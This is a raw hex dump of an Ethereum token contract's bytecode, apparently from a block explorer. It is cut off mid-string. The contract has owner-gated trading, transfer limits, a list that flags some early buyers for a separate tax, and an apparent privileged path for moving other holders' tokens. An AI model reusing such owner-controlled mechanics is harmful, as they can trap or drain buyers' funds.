0e067ead81c8054891684179055600c80548816875284872080548a1685179055601580548916885285882080548b1686179055600d9096527fe491d3ddab46a3ddc2b907c015f7e2686859fac31a4f174b9b79a82620b0324e80548a168517905533875284872080548a16851790559154871686528386208054891684179055855282852080548816831790555485168452818420805487168217905591549093168252919020805490921617905562000721565b3390565b600580546001600160a01b038381166001600160a01b0319831681179093556040519116919082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e090600090a35050565b6001600160a01b038216620004d25760405162461bcd60e51b815260206004820152601f60248201527f45524332303a206d696e7420746f20746865207a65726f206164647265737300604482015260640160405180910390fd5b8060026000828254620004e691906200070b565b90915550506001600160a01b038216600081815260208181526040808320805486019055518481527fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a35050565b505050565b634e487b7160e01b600052604160045260246000fd5b600181811c908216806200056d57607f821691505b6020821081036200058e57634e487b7160e01b600052602260045260246000fd5b50919050565b601f8211156200053d57600081815260208120601f850160051c81016020861015620005bd5750805b601f850160051c820191505b81811015620005de57828155600101620005c9565b505050505050565b81516001600160401b0381111562000602576200060262000542565b6200061a8162000613845462000558565b8462000594565b602080601f831160018114620006525760008415620006395750858301515b600019600386901b1c1916600185901b178555620005de565b600085815260208120601f198616915b82811015620006835788860151825594840194600190910190840162000662565b5085821015620006a25787850151600019600388901b60f8161c191681555b5050505050600190811b01905550565b634e487b7160e01b600052601160045260246000fd5b8082028115828204841417620006e257620006e2620006b2565b92915050565b6000826200070657634e487b7160e01b600052601260045260246000fd5b500490565b80820180821115620006e257620006e2620006b2565b6080516120696200077c600039600081816102fb01528181610690015281816107ca01528181610d7001528181610e0101528181610f1801528181610f4101528181611a4801528181611b000152611b9501526120696000f3fe6080604052600436106102085760003560e01c8063715018a611610118578063aa4bde28116100a0578063e5b37a651161006f578063e5b37a65146105ce578063ef437ff5146105fe578063f2fde38b1461061e578063f7f23a0c1461063e578063fca675a81461064657600080fd5b8063aa4bde281461056d578063b61b64fa14610583578063c9567bf914610599578063dd62ed3e146105ae57600080fd5b80638da5cb5b116100e75780638da5cb5b146104e557806395d89b4114610503578063a014f37d14610518578063a457c2d71461052d578063a9059cbb1461054d57600080fd5b8063715018a614610475578063751039fc1461048a5780638baa82491461049f5780638c0b5e22146104cf57600080fd5b80632fee9e7e1161019b5780633eb5d9b21161016a5780633eb5d9b2146103d457806349bd5a5e146103ea57806349df728c1461040a57806354b762a61461042a57806370a082311461043f57600080fd5b80632fee9e7e14610352578063313ce5671461038257806333ee17931461039e57806339509351146103b457600080fd5b8063095ea7b3116101d7578063095ea7b3146102b95780631694505e146102e957806318160ddd1461031d57806323b872dd1461033257600080fd5b806303fd2a45146102145780630445b6671461025157806306b091f91461027557806306fdde031461029757600080fd5b3661020f57005b600080fd5b34801561022057600080fd5b50600c54610234906001600160a01b031681565b6040516001600160a01b0390911681526020015b60405180910390f35b34801561025d57600080fd5b50610267600a5481565b604051908152602001610248565b34801561028157600080fd5b50610295610290366004611c1e565b61066d565b005b3480156102a357600080fd5b506102ac6108f7565b6040516102489190611c4a565b3480156102c557600080fd5b506102d96102d4366004611c1e565b610989565b6040519015158152602001610248565b3480156102f557600080fd5b506102347f000000000000000000000000000000000000000000000000000000000000000081565b34801561032957600080fd5b50600254610267565b34801561033e57600080fd5b506102d961034d366004611c98565b6109a3565b34801561035e57600080fd5b506102d961036d366004611cd9565b600e6020526000908152604090205460ff1681565b34801561038e57600080fd5b5060405160128152602001610248565b3480156103aa57600080fd5b5061026760125481565b3480156103c057600080fd5b506102d96103cf366004611c1e565b6109c7565b3480156103e057600080fd5b5061026760115481565b3480156103f657600080fd5b50601454610234906001600160a01b031681565b34801561041657600080fd5b50610295610425366004611cd9565b6109e9565b34801561043657600080fd5b506102d9610adb565b34801561044b57600080fd5b5061026761045a366004611cd9565b6001600160a01b031660009081526020819052604090205490565b34801561048157600080fd5b50610295610b22565b34801561049657600080fd5b50610295610b36565b3480156104ab57600080fd5b506102d96104ba366004611cd9565b600f6020526000908152604090205460ff1681565b3480156104db57600080fd5b5061026760085481565b3480156104f157600080fd5b506005546001600160a01b0316610234565b34801561050f57600080fd5b506102ac610b55565b34801561052457600080fd5b506102d9610b64565b34801561053957600080fd5b506102d9610548366004611c1e565b610b8b565b34801561055957600080fd5b506102d9610568366004611c1e565b610c0b565b34801561057957600080fd5b5061026760095481565b34801561058f57600080fd5b5061026760165481565b3480156105a557600080fd5b50610295610c19565b3480156105ba57600080fd5b506102676105c9366004611cfd565b610c8f565b3480156105da57600080fd5b506102d96105e9366004611cd9565b600d6020526000908152604090205460ff1681565b34801561060a57600080fd5b50610295610619366004611d44565b610cba565b34801561062a57600080fd5b50610295610639366004611cd9565b610ced565b610295610d66565b34801561065257600080fd5b506010546106609060ff1681565b6040516102489190611d88565b6040805160028082526060820183526000926020830190803683370190505090507f00000000000000000000000000000000000000000000000000000000000000006001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa1580156106ec573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906107109190611db0565b8160008151811061072357610723611dcd565b60200260200101906001600160a01b031690816001600160a01b031681525050308160018151811061075757610757611dcd565b60200260200101906001600160a01b031690816001600160a01b03168152505060008160018151811061078c5761078c611dcd565b602090810291909101810151336000908152600d90925260409091205490915060ff1661083f5760405163b6f9de9560e01b81526001600160a01b037f0000000000000000000000000000000000000000000000000000000000000000169063b6f9de959085906108089060009087908a904290600401611e27565b6000604051808303818588803b15801561082157600080fd5b505af1158015610835573d6000803e3d6000fd5b50505050506108f1565b6108498484611036565b806001600160a01b03166323b872dd858460018151811061086c5761086c611dcd565b60209081029190910101516040516001600160e01b031960e085901b1681526001600160a01b03928316600482015291166024820152604481018690526064016020604051808303816000875af11580156108cb573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906108ef9190611e5c565b505b50505050565b60606003805461090690611e79565b80601f016020809104026020016040519081016040528092919081815260200182805461093290611e79565b801561097f5780601f106109545761010080835404028352916020019161097f565b820191906000526020600020905b81548152906001019060200180831161096257829003601f168201915b5050505050905090565b600033610997818585611057565b60019150505b92915050565b6000336109b185828561117b565b6109bc8585856111ef565b506001949350505050565b6000336109978185856109da8383610c8f565b6109e49190611ec9565b611057565b6109f1611772565b600b546040516370a0823160e01b81523060048201526001600160a01b038381169263a9059cbb9291169083906370a0823190602401602060405180830381865afa158015610a44573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610a689190611edc565b6040516001600160e01b031960e085901b1681526001600160a01b03909216600483015260248201526044016020604051808303816000875af1158015610ab3573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610ad79190611e5c565b5050565b600b546016546040516000926001600160a01b03169180156108fc029184818181858888f19350505050158015610b16573d6000803e3d6000fd5b50506000601655600190565b610b2a611772565b610b3460006117cc565b565b610b3e611772565b6b033b2e3c9fd0803ce80000006008819055600955565b60606004805461090690611e79565b6000610b6e611772565b506010805460ff1916600317905560006011819055601255600190565b60003381610b998286610c8f565b905083811015610bfe5760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b60648201526084015b60405180910390fd5b6109bc8286868403611057565b6000336109978185856111ef565b610c21611772565b60105462010000900460ff1615610c7a5760405162461bcd60e51b815260206004820152601a60248201527f54726164696e6720697320616c726561647920656e61626c65640000000000006044820152606401610bf5565b6010805463ffff000019166301010000179055565b6001600160a01b03918216600090815260016020908152604080832093909416825291909152205490565b610cc2611772565b6001600160a01b03919091166000908152600e60205260409020805460ff1916911515919091179055565b610cf5611772565b6001600160a01b038116610d5a5760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b6064820152608401610bf5565b610d63816117cc565b50565b610d6e611772565b7f00000000000000000000000000000000000000000000000000000000000000006001600160a01b031663c45a01556040518163ffffffff1660e01b8152600401602060405180830381865afa158015610dcc573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610df09190611db0565b6001600160a01b031663c9c65396307f00000000000000000000000000000000000000000000000000000000000000006001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015610e5d573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610e819190611db0565b6040516001600160e01b031960e085901b1681526001600160a01b039283166004820152911660248201526044016020604051808303816000875af1158015610ece573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610ef29190611db0565b601480546001600160a01b0319166001600160a01b0392909216919091179055610f3f307f0000000000000000000000000000000000000000000000000000000000000000600019611057565b7f00000000000000000000000000000000000000000000000000000000000000006001600160a01b031663f305d7193430610f8f306001600160a01b031660009081526020819052604090205490565b600080610fa46005546001600160a01b031690565b60405160e088901b6001600160e01b03191681526001600160a01b03958616600482015260248101949094526044840192909252606483015290911660848201524260a482015260c40160606040518083038185885af115801561100c573d6000803e3d6000fd5b50505050506040513d601f19601f820116820180604052508101906110319190611ef5565b505050565b3060006110438285610c8f565b905060001981146108f1576108f184838584035b6001600160a01b0383166110b95760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b6064820152608401610bf5565b6001600160a01b03821661111a5760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b6064820152608401610bf5565b6001600160a01b0383811660008181526001602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b60006111878484610c8f565b905060001981146108f157818110156111e25760405162461bcd60e51b815260206004820152601d60248201527f45524332303a20696e73756666696369656e7420616c6c6f77616e63650000006044820152606401610bf5565b6108f18484848403611057565b6001600160a01b0383166112155760405162461bcd60e51b8152600401610bf590611f23565b6001600160a01b03821661123b5760405162461bcd60e51b8152600401610bf590611f68565b6001600160a01b0383166000908152600d602052604090205460ff1615801561127d57506001600160a01b0382166000908152600d602052604090205460ff16155b156112d05760105462010000900460ff166112d05760405162461bcd60e51b8152602060048201526013602482015272151c98591a5b99c81b9bdd08195b98589b1959606a1b6044820152606401610bf5565b6001600160a01b0383166000908152600e602052604090205460ff1615801561131257506001600160a01b0382166000908152600e602052604090205460ff16155b15611437576014546001600160a01b03838116911614611437576008548111156113a45760405162461bcd60e51b815260206004820152603d60248201527f45524332303a207472616e7366657220616d6f756e742065786365656473207460448201527f6865206d6178207472616e73616374696f6e20616d6f756e74206265660000006064820152608401610bf5565b6009546001600160a01b0383166000908152602081905260409020546113ca9083611ec9565b11156114375760405162461bcd60e51b815260206004820152603660248201527f45524332303a2062616c616e636520616d6f756e74206578636565646564206d604482015275185e081dd85b1b195d08185b5bdd5b9d081b1a5b5a5d60521b6064820152608401610bf5565b6001600160a01b0383166000908152600d6020526040902054819060ff1615801561147b57506001600160a01b0383166000908152600d602052604090205460ff16155b15611767576014546001600160a01b03858116911614806114a957506014546001600160a01b038481169116145b156116f0576008548211156115265760405162461bcd60e51b815260206004820152603960248201527f45524332303a207472616e7366657220616d6f756e742065786365656473207460448201527f6865206d6178207472616e73616374696f6e20616d6f756e74000000000000006064820152608401610bf5565b6014546001600160a01b03858116911614801561155c57506001600160a01b0383166000908152600e602052604090205460ff16155b801561157157506001600160a01b0384163014155b156115ef57600060105460ff16600381111561158f5761158f611d72565b036115b8576001600160a01b0383166000908152600f60205260409020805460ff191660011790555b60006064601154846115ca9190611fab565b6115d49190611fc2565b90506115e185308361181e565b6115eb8184611fe4565b9150505b6014546001600160a01b03848116911614801561162557506001600160a01b0384166000908152600e602052604090205460ff16155b801561163a57506001600160a01b0383163014155b801561164f57506010546301000000900460ff165b80156116635750601054610100900460ff16155b156116eb576012546001600160a01b0385166000908152600f602052604090205460ff16151560010361169557506013545b6010805461ff0019166101001790556116ac611948565b6010805461ff0019169055600060646116c58386611fab565b6116cf9190611fc2565b90506116dc86308361181e565b6116e68185611fe4565b925050505b611767565b6001600160a01b0384166000908152600f602052604090205460ff161515600114801561172b57506014546001600160a01b03848116911614155b156117675760006064601354846117429190611fab565b61174c9190611fc2565b905061175985308361181e565b6117638184611fe4565b9150505b6108f184848361181e565b6005546001600160a01b03163314610b345760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65726044820152606401610bf5565b600580546001600160a01b038381166001600160a01b0319831681179093556040519116919082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e090600090a35050565b6001600160a01b0383166118445760405162461bcd60e51b8152600401610bf590611f23565b6001600160a01b03821661186a5760405162461bcd60e51b8152600401610bf590611f68565b6001600160a01b038316600090815260208190526040902054818110156118e25760405162461bcd60e51b815260206004820152602660248201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604482015265616c616e636560d01b6064820152608401610bf5565b6001600160a01b03848116600081815260208181526040808320878703905593871680835291849020805487019055925185815290927fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a36108f1565b3060009081526020819052604090205460000361196157565b3060009081526020819052604080822054600b546001600160a01b0316835290822054600a5447919084908411156108ef574792506119a18460006119f1565b6119ab8347611fe4565b9450600a548211156119d357806119c35760006119c5565b845b6119cf9086611fc2565b6016555b84601660008282546119e59190611ec9565b90915550505050505050565b6040805160028082526060820183526000926020830190803683370190505090503081600081518110611a2657611a26611dcd565b60200260200101906001600160a01b031690816001600160a01b0316815250507f00000000000000000000000000000000000000000000000000000000000000006001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015611aa4573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190611ac89190611db0565b81600181518110611adb57611adb611dcd565b6001600160a01b03928316602091820292909201015260405163095ea7b360e01b81527f000000000000000000000000000000000000000000000000000000000000000090911660048201526000196024820152309063095ea7b3906044016020604051808303816000875af1158015611b59573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190611b7d9190611e5c565b5060405163791ac94760e01b81526001600160a01b037f0000000000000000000000000000000000000000000000000000000000000000169063791ac94790611bd29086908690869030904290600401611ff7565b600060405180830381600087803b158015611bec57600080fd5b505af1158015611c00573d6000803e3d6000fd5b50505050505050565b6001600160a01b0381168114610d6357600080fd5b60008060408385031215611c3157600080fd5b8235611c3c81611c09565b946020939093013593505050565b600060208083528351808285015260005b81811015611c7757858101830151858201604001528201611c5b565b506000604082860101526040601f19601f8301168501019250505092915050565b600080600060608486031215611cad57600080fd5b8335611cb881611c09565b92506020840135611cc881611c09565b929592945050506040919091013590565b600060208284031215611ceb57600080fd5b8135611cf681611c09565b9392505050565b60008060408385031215611d1057600080fd5b8235611d1b81611c09565b91506020830135611d2b81611c09565b809150509250929050565b8015158114610d6357600080fd5b60008060408385031215611d5757600080fd5b8235611d6281611c09565b91506020830135611d2b81611d36565b634e487b7160e01b600052602160045260246000fd5b6020810160048310611daa57634e487b7160e01b600052602160045260246000fd5b91905290565b600060208284031215611dc257600080fd5b8151611cf681611c09565b634e487b7160e01b600052603260045260246000fd5b600081518084526020808501945080840160005b83811015611e1c5781516001600160a01b031687529582019590820190600101611df7565b509495945050505050565b848152608060208201526000611e406080830186611de3565b6001600160a01b03949094166040830152506060015292915050565b600060208284031215611e6e57600080fd5b8151611cf681611d36565b600181811c90821680611e8d57607f821691505b602082108103611ead57634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fd5b8082018082111561099d5761099d611eb3565b600060208284031215611eee57600080fd5b5051919050565b600080600060608486031215611f0a57600080fd5b8351925060208401519150604084015190509250925092565b60208082526025908201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604082015264647265737360d81b606082015260800190565b60208082526023908201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260408201526265737360e81b606082015260800190565b808202811582820484141761099d5761099d611eb3565b600082611fdf57634e487b7160e01b600052601260045260246000fd5b500490565b8181038181111561099d5761099d611eb3565b85815284602082015260a06040820152600061201660a0830186611de3565b6001600160a01b039490941660608301525060800152939250505056fea26469706673582212202333896be9770486bdada30ffc4277eb23a6573a1f4b1162af48a51424d7957964736f6c63430008120033
Deployed Bytecode
0x6080604052600436106102085760003560e01c8063715018a611610118578063aa4bde28116100a0578063e5b37a651161006f578063e5b37a65146105ce578063ef437ff5146105fe578063f2fde38b1461061e578063f7f23a0c1461063e578063fca675a81461064657600080fd5b8063aa4bde281461056d578063b61b64fa14610583578063c9567bf914610599578063dd62ed3e146105ae57600080fd5b80638da5cb5b116100e75780638da5cb5b146104e557806395d89b4114610503578063a014f37d14610518578063a457c2d71461052d578063a9059cbb1461054d57600080fd5b8063715018a614610475578063751039fc1461048a5780638baa82491461049f5780638c0b5e22146104cf57600080fd5b80632fee9e7e1161019b5780633eb5d9b21161016a5780633eb5d9b2146103d457806349bd5a5e146103ea57806349df728c1461040a57806354b762a61461042a57806370a082311461043f57600080fd5b80632fee9e7e14610352578063313ce5671461038257806333ee17931461039e57806339509351146103b457600080fd5b8063095ea7b3116101d7578063095ea7b3146102b95780631694505e146102e957806318160ddd1461031d57806323b872dd1461033257600080fd5b806303fd2a45146102145780630445b6671461025157806306b091f91461027557806306fdde031461029757600080fd5b3661020f57005b600080fd5b34801561022057600080fd5b50600c54610234906001600160a01b031681565b6040516001600160a01b0390911681526020015b60405180910390f35b34801561025d57600080fd5b50610267600a5481565b604051908152602001610248565b34801561028157600080fd5b50610295610290366004611c1e565b61066d565b005b3480156102a357600080fd5b506102ac6108f7565b6040516102489190611c4a565b3480156102c557600080fd5b506102d96102d4366004611c1e565b610989565b6040519015158152602001610248565b3480156102f557600080fd5b506102347f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d81565b34801561032957600080fd5b50600254610267565b34801561033e57600080fd5b506102d961034d366004611c98565b6109a3565b34801561035e57600080fd5b506102d961036d366004611cd9565b600e6020526000908152604090205460ff1681565b34801561038e57600080fd5b5060405160128152602001610248565b3480156103aa57600080fd5b5061026760125481565b3480156103c057600080fd5b506102d96103cf366004611c1e565b6109c7565b3480156103e057600080fd5b5061026760115481565b3480156103f657600080fd5b50601454610234906001600160a01b031681565b34801561041657600080fd5b50610295610425366004611cd9565b6109e9565b34801561043657600080fd5b506102d9610adb565b34801561044b57600080fd5b5061026761045a366004611cd9565b6001600160a01b031660009081526020819052604090205490565b34801561048157600080fd5b50610295610b22565b34801561049657600080fd5b50610295610b36565b3480156104ab57600080fd5b506102d96104ba366004611cd9565b600f6020526000908152604090205460ff1681565b3480156104db57600080fd5b5061026760085481565b3480156104f157600080fd5b506005546001600160a01b0316610234565b34801561050f57600080fd5b506102ac610b55565b34801561052457600080fd5b506102d9610b64565b34801561053957600080fd5b506102d9610548366004611c1e565b610b8b565b34801561055957600080fd5b506102d9610568366004611c1e565b610c0b565b34801561057957600080fd5b5061026760095481565b34801561058f57600080fd5b5061026760165481565b3480156105a557600080fd5b50610295610c19565b3480156105ba57600080fd5b506102676105c9366004611cfd565b610c8f565b3480156105da57600080fd5b506102d96105e9366004611cd9565b600d6020526000908152604090205460ff1681565b34801561060a57600080fd5b50610295610619366004611d44565b610cba565b34801561062a57600080fd5b50610295610639366004611cd9565b610ced565b610295610d66565b34801561065257600080fd5b506010546106609060ff1681565b6040516102489190611d88565b6040805160028082526060820183526000926020830190803683370190505090507f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d6001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa1580156106ec573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906107109190611db0565b8160008151811061072357610723611dcd565b60200260200101906001600160a01b031690816001600160a01b031681525050308160018151811061075757610757611dcd565b60200260200101906001600160a01b031690816001600160a01b03168152505060008160018151811061078c5761078c611dcd565b602090810291909101810151336000908152600d90925260409091205490915060ff1661083f5760405163b6f9de9560e01b81526001600160a01b037f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d169063b6f9de959085906108089060009087908a904290600401611e27565b6000604051808303818588803b15801561082157600080fd5b505af1158015610835573d6000803e3d6000fd5b50505050506108f1565b6108498484611036565b806001600160a01b03166323b872dd858460018151811061086c5761086c611dcd565b60209081029190910101516040516001600160e01b031960e085901b1681526001600160a01b03928316600482015291166024820152604481018690526064016020604051808303816000875af11580156108cb573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906108ef9190611e5c565b505b50505050565b60606003805461090690611e79565b80601f016020809104026020016040519081016040528092919081815260200182805461093290611e79565b801561097f5780601f106109545761010080835404028352916020019161097f565b820191906000526020600020905b81548152906001019060200180831161096257829003601f168201915b5050505050905090565b600033610997818585611057565b60019150505b92915050565b6000336109b185828561117b565b6109bc8585856111ef565b506001949350505050565b6000336109978185856109da8383610c8f565b6109e49190611ec9565b611057565b6109f1611772565b600b546040516370a0823160e01b81523060048201526001600160a01b038381169263a9059cbb9291169083906370a0823190602401602060405180830381865afa158015610a44573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610a689190611edc565b6040516001600160e01b031960e085901b1681526001600160a01b03909216600483015260248201526044016020604051808303816000875af1158015610ab3573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610ad79190611e5c565b5050565b600b546016546040516000926001600160a01b03169180156108fc029184818181858888f19350505050158015610b16573d6000803e3d6000fd5b50506000601655600190565b610b2a611772565b610b3460006117cc565b565b610b3e611772565b6b033b2e3c9fd0803ce80000006008819055600955565b60606004805461090690611e79565b6000610b6e611772565b506010805460ff1916600317905560006011819055601255600190565b60003381610b998286610c8f565b905083811015610bfe5760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b60648201526084015b60405180910390fd5b6109bc8286868403611057565b6000336109978185856111ef565b610c21611772565b60105462010000900460ff1615610c7a5760405162461bcd60e51b815260206004820152601a60248201527f54726164696e6720697320616c726561647920656e61626c65640000000000006044820152606401610bf5565b6010805463ffff000019166301010000179055565b6001600160a01b03918216600090815260016020908152604080832093909416825291909152205490565b610cc2611772565b6001600160a01b03919091166000908152600e60205260409020805460ff1916911515919091179055565b610cf5611772565b6001600160a01b038116610d5a5760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b6064820152608401610bf5565b610d63816117cc565b50565b610d6e611772565b7f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d6001600160a01b031663c45a01556040518163ffffffff1660e01b8152600401602060405180830381865afa158015610dcc573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610df09190611db0565b6001600160a01b031663c9c65396307f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d6001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015610e5d573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610e819190611db0565b6040516001600160e01b031960e085901b1681526001600160a01b039283166004820152911660248201526044016020604051808303816000875af1158015610ece573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610ef29190611db0565b601480546001600160a01b0319166001600160a01b0392909216919091179055610f3f307f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d600019611057565b7f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d6001600160a01b031663f305d7193430610f8f306001600160a01b031660009081526020819052604090205490565b600080610fa46005546001600160a01b031690565b60405160e088901b6001600160e01b03191681526001600160a01b03958616600482015260248101949094526044840192909252606483015290911660848201524260a482015260c40160606040518083038185885af115801561100c573d6000803e3d6000fd5b50505050506040513d601f19601f820116820180604052508101906110319190611ef5565b505050565b3060006110438285610c8f565b905060001981146108f1576108f184838584035b6001600160a01b0383166110b95760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b6064820152608401610bf5565b6001600160a01b03821661111a5760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b6064820152608401610bf5565b6001600160a01b0383811660008181526001602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b60006111878484610c8f565b905060001981146108f157818110156111e25760405162461bcd60e51b815260206004820152601d60248201527f45524332303a20696e73756666696369656e7420616c6c6f77616e63650000006044820152606401610bf5565b6108f18484848403611057565b6001600160a01b0383166112155760405162461bcd60e51b8152600401610bf590611f23565b6001600160a01b03821661123b5760405162461bcd60e51b8152600401610bf590611f68565b6001600160a01b0383166000908152600d602052604090205460ff1615801561127d57506001600160a01b0382166000908152600d602052604090205460ff16155b156112d05760105462010000900460ff166112d05760405162461bcd60e51b8152602060048201526013602482015272151c98591a5b99c81b9bdd08195b98589b1959606a1b6044820152606401610bf5565b6001600160a01b0383166000908152600e602052604090205460ff1615801561131257506001600160a01b0382166000908152600e602052604090205460ff16155b15611437576014546001600160a01b03838116911614611437576008548111156113a45760405162461bcd60e51b815260206004820152603d60248201527f45524332303a207472616e7366657220616d6f756e742065786365656473207460448201527f6865206d6178207472616e73616374696f6e20616d6f756e74206265660000006064820152608401610bf5565b6009546001600160a01b0383166000908152602081905260409020546113ca9083611ec9565b11156114375760405162461bcd60e51b815260206004820152603660248201527f45524332303a2062616c616e636520616d6f756e74206578636565646564206d604482015275185e081dd85b1b195d08185b5bdd5b9d081b1a5b5a5d60521b6064820152608401610bf5565b6001600160a01b0383166000908152600d6020526040902054819060ff1615801561147b57506001600160a01b0383166000908152600d602052604090205460ff16155b15611767576014546001600160a01b03858116911614806114a957506014546001600160a01b038481169116145b156116f0576008548211156115265760405162461bcd60e51b815260206004820152603960248201527f45524332303a207472616e7366657220616d6f756e742065786365656473207460448201527f6865206d6178207472616e73616374696f6e20616d6f756e74000000000000006064820152608401610bf5565b6014546001600160a01b03858116911614801561155c57506001600160a01b0383166000908152600e602052604090205460ff16155b801561157157506001600160a01b0384163014155b156115ef57600060105460ff16600381111561158f5761158f611d72565b036115b8576001600160a01b0383166000908152600f60205260409020805460ff191660011790555b60006064601154846115ca9190611fab565b6115d49190611fc2565b90506115e185308361181e565b6115eb8184611fe4565b9150505b6014546001600160a01b03848116911614801561162557506001600160a01b0384166000908152600e602052604090205460ff16155b801561163a57506001600160a01b0383163014155b801561164f57506010546301000000900460ff165b80156116635750601054610100900460ff16155b156116eb576012546001600160a01b0385166000908152600f602052604090205460ff16151560010361169557506013545b6010805461ff0019166101001790556116ac611948565b6010805461ff0019169055600060646116c58386611fab565b6116cf9190611fc2565b90506116dc86308361181e565b6116e68185611fe4565b925050505b611767565b6001600160a01b0384166000908152600f602052604090205460ff161515600114801561172b57506014546001600160a01b03848116911614155b156117675760006064601354846117429190611fab565b61174c9190611fc2565b905061175985308361181e565b6117638184611fe4565b9150505b6108f184848361181e565b6005546001600160a01b03163314610b345760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65726044820152606401610bf5565b600580546001600160a01b038381166001600160a01b0319831681179093556040519116919082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e090600090a35050565b6001600160a01b0383166118445760405162461bcd60e51b8152600401610bf590611f23565b6001600160a01b03821661186a5760405162461bcd60e51b8152600401610bf590611f68565b6001600160a01b038316600090815260208190526040902054818110156118e25760405162461bcd60e51b815260206004820152602660248201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604482015265616c616e636560d01b6064820152608401610bf5565b6001600160a01b03848116600081815260208181526040808320878703905593871680835291849020805487019055925185815290927fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a36108f1565b3060009081526020819052604090205460000361196157565b3060009081526020819052604080822054600b546001600160a01b0316835290822054600a5447919084908411156108ef574792506119a18460006119f1565b6119ab8347611fe4565b9450600a548211156119d357806119c35760006119c5565b845b6119cf9086611fc2565b6016555b84601660008282546119e59190611ec9565b90915550505050505050565b6040805160028082526060820183526000926020830190803683370190505090503081600081518110611a2657611a26611dcd565b60200260200101906001600160a01b031690816001600160a01b0316815250507f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d6001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015611aa4573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190611ac89190611db0565b81600181518110611adb57611adb611dcd565b6001600160a01b03928316602091820292909201015260405163095ea7b360e01b81527f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d90911660048201526000196024820152309063095ea7b3906044016020604051808303816000875af1158015611b59573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190611b7d9190611e5c565b5060405163791ac94760e01b81526001600160a01b037f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d169063791ac94790611bd29086908690869030904290600401611ff7565b600060405180830381600087803b158015611bec57600080fd5b505af1158015611c00573d6000803e3d6000fd5b50505050505050565b6001600160a01b0381168114610d6357600080fd5b60008060408385031215611c3157600080fd5b8235611c3c81611c09565b946020939093013593505050565b600060208083528351808285015260005b81811015611c7757858101830151858201604001528201611c5b565b506000604082860101526040601f19601f8301168501019250505092915050565b600080600060608486031215611cad57600080fd5b8335611cb881611c09565b92506020840135611cc881611c09565b929592945050506040919091013590565b600060208284031215611ceb57600080fd5b8135611cf681611c09565b9392505050565b60008060408385031215611d1057600080fd5b8235611d1b81611c09565b91506020830135611d2b81611c09565b809150509250929050565b8015158114610d6357600080fd5b60008060408385031215611d5757600080fd5b8235611d6281611c09565b91506020830135611d2b81611d36565b634e487b7160e01b6000526